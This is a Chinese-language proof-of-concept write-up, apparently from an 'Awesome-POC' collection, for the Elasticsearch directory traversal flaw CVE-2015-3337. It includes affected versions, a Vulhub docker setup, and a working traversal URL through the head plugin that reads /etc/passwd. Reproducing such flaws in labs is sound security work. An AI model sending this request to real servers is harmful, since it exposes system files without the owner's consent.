Awesome-POC/数据库漏洞/ElasticSearch 目录穿越漏洞 CVE-2015-3337.md
2024-11-06 14:10:36 +08:00

32 lines
829 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ElasticSearch 目录穿越漏洞 CVE-2015-3337
## 漏洞描述
在安装了具有“site”功能的插件以后插件目录使用`../`即可向上跳转导致目录穿越漏洞可读取任意文件。没有安装任意插件的elasticsearch不受影响。
## 漏洞影响
```
Elasticsearch 1.4.5以下/1.5.2以下
```
## 环境搭建
jre版本openjdk:8-jre
elasticsearch版本v1.4.4
Vulhub编译及运行测试环境
```
docker-compose build
docker-compose up -d
```
测试环境默认安装了一个插件:`elasticsearch-head`主页在此https://github.com/mobz/elasticsearch-head
## 漏洞复现
访问`http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd`读取任意文件(不要在浏览器访问):
![image-20230306151546964](images/image-20230306151546964.png)